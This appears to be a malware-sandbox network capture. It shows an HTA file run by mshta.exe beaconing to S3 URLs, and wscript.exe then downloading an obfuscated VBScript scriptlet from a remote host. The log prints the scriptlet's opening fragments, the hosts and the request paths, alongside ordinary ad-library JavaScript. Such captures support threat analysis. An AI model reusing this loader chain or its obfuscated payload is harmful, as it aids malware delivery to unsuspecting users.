                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 61 28 61 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 2c 69 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 6a 61 3b 69
                                                                                                                                                                                                                              Data Ascii: :function(){return ha(aa(this))}})}return a},"es6");var ha=function(a){a={next:a};a[u(t.Symbol,"iterator")]=function(){return this};return a},ia=typeof Object.create=="function"?Object.create:function(a){var b=function(){};b.prototype=a;return new b},ja;i
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 31 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 64 29 66 6f 72 28 76 61 72 20 65 20 69 6e 20 64 29 71 61 28 64 2c 65 29 26 26 28 61 5b 65 5d 3d 64 5b 65 5d 29 7d 72 65 74 75 72 6e 20 61 7d 3b 77 28 22 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 73 61 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 74 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                              Data Ascii: on(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)qa(d,e)&&(a[e]=d[e])}return a};w("Object.assign",function(a){return a||sa},"es6");var ta=function(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 2e 67 29 3f 64 65 6c 65 74 65 20 67 5b 64 5d 5b 74 68 69 73 2e 67 5d 3a 21 31 7d 3b 72 65 74 75 72 6e 20 66 7d 2c 22 65 73 36 22 29 3b 77 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 75 28 61 2e 70 72 6f 74 6f 74 79 70 65 2c 22 65 6e 74 72 69 65 73 22 29 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 7a 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c
                                                                                                                                                                                                                              Data Ascii: .g)?delete g[d][this.g]:!1};return f},"es6");w("Map",function(a){if(function(){if(!a||typeof a!="function"||!u(a.prototype,"entries")||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(z([[h,"s"]]));if(k.get(h)!="s"||k.size!=1||
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 6b 65 79 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 76 61 6c 75 65 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 75 28 74 68 69 73 2c 22 65 6e 74 72 69 65 73 22 29 2e 63 61 6c 6c 28 74 68 69 73 29 2c 70 3b 21 28 70 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 70 3d 70 2e 76 61 6c 75 65 2c 68 2e 63 61 6c 6c 28 6b 2c 70 5b 31 5d 2c 70 5b 30 5d 2c 74 68 69 73 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                              Data Ascii: turn e(this,function(h){return h.key})};c.prototype.values=function(){return e(this,function(h){return h.value})};c.prototype.forEach=function(h,k){for(var l=u(this,"entries").call(this),p;!(p=l.next()).done;)p=p.value,h.call(k,p[1],p[0],this)};c.prototyp
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 64 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 63 3d 3d 3d 30 3f 30 3a 63 3b 74 68 69 73 2e 67 2e 73 65 74 28 63 2c 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 74 68 69 73 2e 67 2e 64 65 6c 65 74 65 28 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 63 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73
                                                                                                                                                                                                                              Data Ascii: ).done;)this.add(d.value)}this.size=this.g.size};b.prototype.add=function(c){c=c===0?0:c;this.g.set(c,c);this.size=this.g.size;return this};b.prototype.delete=function(c){c=this.g.delete(c);this.size=this.g.size;return c};b.prototype.clear=function(){this
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 77 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 75 61 28 74 68 69 73 2c 62 2c 22 69 6e 63 6c 75 64 65 73 22 29 2e 69 6e 64 65 78 4f 66 28 62 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 2c 22 65 73 36 22 29 3b 77 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66
                                                                                                                                                                                                                              Data Ascii: ular expression");return a+""};w("String.prototype.includes",function(a){return a?a:function(b,c){return ua(this,b,"includes").indexOf(b,c||0)!==-1}},"es6");w("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 67 3e 3d 66 7d 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 76 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 2b 3d 22 22 29 3b 76 61 72 20 63 3d 30 2c 64 3d 21 31 2c 65 3d 7b 6e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 64 26 26 63 3c 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 66 3d 63 2b 2b 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 62 28 66 2c 61 5b 66 5d 29 2c 64 6f 6e 65 3a 21 31 7d 7d 64 3d 21 30 3b 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 7d 3b 65 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72
                                                                                                                                                                                                                              Data Ascii: turn!1;return g>=f}},"es6");var va=function(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:function(){if(!d&&c<a.length){var f=c++;return{value:b(f,a[f]),done:!1}}d=!0;return{done:!0,value:void 0}}};e[u(t.Symbol,"iterator")]=function(){return e};r
                                                                                                                                                                                                                              2024-12-23 09:33:37 UTC1390INData Raw: 7b 76 61 72 20 63 3d 77 61 28 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 29 3b 61 3d 63 26 26 63 5b 61 5d 3b 72 65 74 75 72 6e 20 61 21 3d 6e 75 6c 6c 3f 61 3a 62 7d 2c 77 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 42 2c 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 62 3d 62 5b 61 5b 63 5d 5d 2c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 7d 2c 79 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 61 3b 72 65 74 75 72 6e 20 62 21 3d 22 6f 62 6a 65 63 74 22 3f 62 3a 61 3f 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 22 61 72 72 61 79 22 3a 62 3a 22 6e 75 6c 6c 22 7d 2c 7a 61 3d 66 75 6e
                                                                                                                                                                                                                              Data Ascii: {var c=wa("CLOSURE_FLAGS");a=c&&c[a];return a!=null?a:b},wa=function(a){a=a.split(".");for(var b=B,c=0;c<a.length;c++)if(b=b[a[c]],b==null)return null;return b},ya=function(a){var b=typeof a;return b!="object"?b:a?Array.isArray(a)?"array":b:"null"},za=fun


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.2.64983216.12.1.684433416C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:33:59 UTC450OUTGET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:34:00 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                              x-amz-id-2: OjQjfbkxeVzmgySkQU3EnxL0mroimZAw5ydp2UHEKrTLbTy2DCKB3S8bORCx0ER4aUulHfttPNo=
                                                                                                                                                                                                                              x-amz-request-id: X5CX0P501J50W297
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:34:01 GMT
                                                                                                                                                                                                                              Last-Modified: Thu, 04 May 2017 08:21:21 GMT
                                                                                                                                                                                                                              ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                              x-amz-meta-s3cmd-attrs: uid:502/gname:staff/uname:user/gid:20/mode:33188/mtime:1493416832/atime:1493796970/md5:d41d8cd98f00b204e9800998ecf8427e/ctime:1493416832
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              2192.168.2.64983416.12.2.24433416C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:34:00 UTC350OUTGET /image.jpeg?x-cm=lasa&x-ref= HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: logs-referer.s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:34:00 UTC376INHTTP/1.1 200 OK
                                                                                                                                                                                                                              x-amz-id-2: KjSxOplICx7G1h+OajpcePViP0wzM72tngY8ulG0IKnU+c6SejHwqM3Qg5jdIDQe7n07t0wMMMA=
                                                                                                                                                                                                                              x-amz-request-id: X5CM2PM3FGQ18AS4
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:34:01 GMT
                                                                                                                                                                                                                              Last-Modified: Mon, 10 May 2021 15:23:45 GMT
                                                                                                                                                                                                                              ETag: "2e85899818427b96f57db55dd05d06a7"
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                              Content-Length: 285
                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2024-12-23 09:34:00 UTC285INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 72 4f 56 64 56 47 72 64 5d 64 81 79 72 88 ab ff ba ab 9d 9d ab ff fa ff cf ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff db 00 43 01 79 81 81 ab 96 ab ff ba ba ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c0 00 11 08 00 01 00 01 03 01 22 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii: JFIFCrOVdVGrd]dyrCy"


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              3192.168.2.64983792.205.57.1024436428C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:34:00 UTC298OUTGET //g1 HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:34:01 UTC247INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:34:00 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                              Location: https://102.57.205.92.host.secureserver.net/g1/
                                                                                                                                                                                                                              Content-Length: 357
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              2024-12-23 09:34:01 UTC357INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 30 32 2e 35 37 2e 32 30 35 2e 39 32 2e 68 6f 73 74 2e 73 65 63 75 72 65 73 65 72 76 65 72 2e 6e 65 74 2f 67 31 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p><hr><address>A


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              4192.168.2.64984592.205.57.1024436428C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:34:02 UTC298OUTGET /g1/ HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:34:03 UTC199INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 09:34:02 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Content-Type: text/plain;;charset=UTF-8
                                                                                                                                                                                                                              2024-12-23 09:34:03 UTC6INData Raw: 36 37 30 31 0d 0a
                                                                                                                                                                                                                              Data Ascii: 6701
                                                                                                                                                                                                                              2024-12-23 09:34:03 UTC16384INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0d 0a 3c 63 6f 6d 70 6f 6e 65 6e 74 20 69 64 3d 22 63 6f 6d 70 6f 6e 65 6e 74 32 22 3e 0d 0a 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 3c 21 5b 43 44 41 54 41 5b 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 6f 46 50 4a 5a 6f 71 39 58 6d 4d 63 37 50 6e 50 4b 51 6a 48 5f 31 37 28 70 4a 36 63 58 75 77 55 72 76 6a 5f 32 36 2c 20 68 77 6d 68 6f 75 6b 68 4b 4a 5f 31 29 0d 0a 44 69 6d 20 79 4a 32 52 54 35 6e 50 71 52 4e 5f 32 37 2c 20 6c 66 75 50 65 67 79 76 5f 32 38 0d 0a 79 4a 32 52 54 35 6e 50 71 52 4e 5f 32 37 20 3d 20 61 73 63 28 4d 69 64 28 70 4a 36 63 58 75 77 55 72 76 6a 5f
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><component id="component2"><script language="VBScript"><![CDATA[function deoFPJZoq9XmMc7PnPKQjH_17(pJ6cXuwUrvj_26, hwmhoukhKJ_1)Dim yJ2RT5nPqRN_27, lfuPegyv_28yJ2RT5nPqRN_27 = asc(Mid(pJ6cXuwUrvj_
                                                                                                                                                                                                                              2024-12-23 09:34:03 UTC9985INData Raw: 6e 39 41 39 35 76 55 38 42 46 38 5f 34 37 20 3c 20 30 29 20 74 68 65 6e 0d 0a 20 20 50 47 46 56 77 5a 67 72 64 73 4d 77 6d 43 35 7a 39 4b 5f 34 35 20 3d 20 6b 75 45 33 6e 75 70 35 4d 6e 39 41 39 35 76 55 38 42 46 38 5f 34 37 20 2b 20 32 35 36 20 20 20 20 20 20 20 0d 0a 20 20 65 6c 73 65 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 50 47 46 56 77 5a 67 72 64 73 4d 77 6d 43 35 7a 39 4b 5f 34 35 20 3d 20 6b 75 45 33 6e 75 70 35 4d 6e 39 41 39 35 76 55 38 42 46 38 5f 34 37 20 20 20 20 20 0d 0a 20 20 65 6e 64 20 69 66 20 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 74 72 41 55 4d 59 49 49 45 78 49 33 4a 7a 5f 34 34 20 3e 3d 20 39 29 20 74 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 74 72 41 55 4d 59 49 49 45 78 49 33 4a 7a 5f 34 34 20 3d 20 30 20 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: n9A95vU8BF8_47 < 0) then PGFVwZgrdsMwmC5z9K_45 = kuE3nup5Mn9A95vU8BF8_47 + 256 else PGFVwZgrdsMwmC5z9K_45 = kuE3nup5Mn9A95vU8BF8_47 end if if (trAUMYIIExI3Jz_44 >= 9) then trAUMYIIExI3Jz_44 = 0
                                                                                                                                                                                                                              2024-12-23 09:34:03 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              2024-12-23 09:34:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              5192.168.2.649859172.217.19.1944433416C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-12-23 09:34:06 UTC364OUTGET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                              Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                                                              Content-Length: 503867
                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 15:29:29 GMT
                                                                                                                                                                                                                              Expires: Mon, 22 Dec 2025 15:29:29 GMT
                                                                                                                                                                                                                              Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                              ETag: 5395541545685299795
                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Age: 65077
                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              2024-12-23 09:34:07 UTC649INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 2d 32 30 31 38 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2c 20 4e 65 74 66 6c 69 78 2c 20 49 6e 63 2e 2c 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 2e 20 61 6e 64 20
                                                                                                                                                                                                                              Data Ascii: (function(_){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ /* Copyright Google LLC SPDX-License-Identifier: Apache-2.0 */ /* Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and
